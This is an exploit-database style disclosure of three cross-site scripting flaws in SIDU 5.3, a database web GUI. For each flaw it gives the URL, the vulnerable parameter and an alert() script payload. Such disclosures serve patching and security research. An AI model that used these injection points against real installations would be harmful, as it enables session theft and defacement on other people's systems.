SIDU version 5.3 database web gui suffers from multiple cross site scripting vulnerabilities.
a73fc60d352182086b48da0627c41e251802f57716fa0c7840c2ecc1598056db
########################################################################################
# Exploit Title: SIDU 5.3 Database Web GUI Multiple XSS Vulnerabilities
# Date: 04.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://topnew.net/sidu/
# Software Link: https://sourceforge.net/projects/sidu/files/sidu/sidu53.zip
# Version: [app version] 5.3
########################################################################################
XSS details:
########################################################################################
XSS1
URL
http://localhost/sidu53/conn.php
METHOD
Post
PARAMETER
conn[dbs]
PAYLOAD
<script>alert(1)</script>
########################################################################################
XSS2
URL
http://localhost/sidu53/user.php?id=1,,,,,%27%3E%3Cscript%3Ealert%282%29%3C/script%3E
METHOD
Get
PARAMETER
id
PAYLOAD
'><script>alert(2)</script>
########################################################################################
XSS3
URL
http://localhost/sidu53/bChart.php?ses=%3Cscript%3Ealert%283%29%3C/script%3E
METHOD
Get
PARAMETER
ses
PAYLOAD
<script>alert(3)</script>
########################################################################################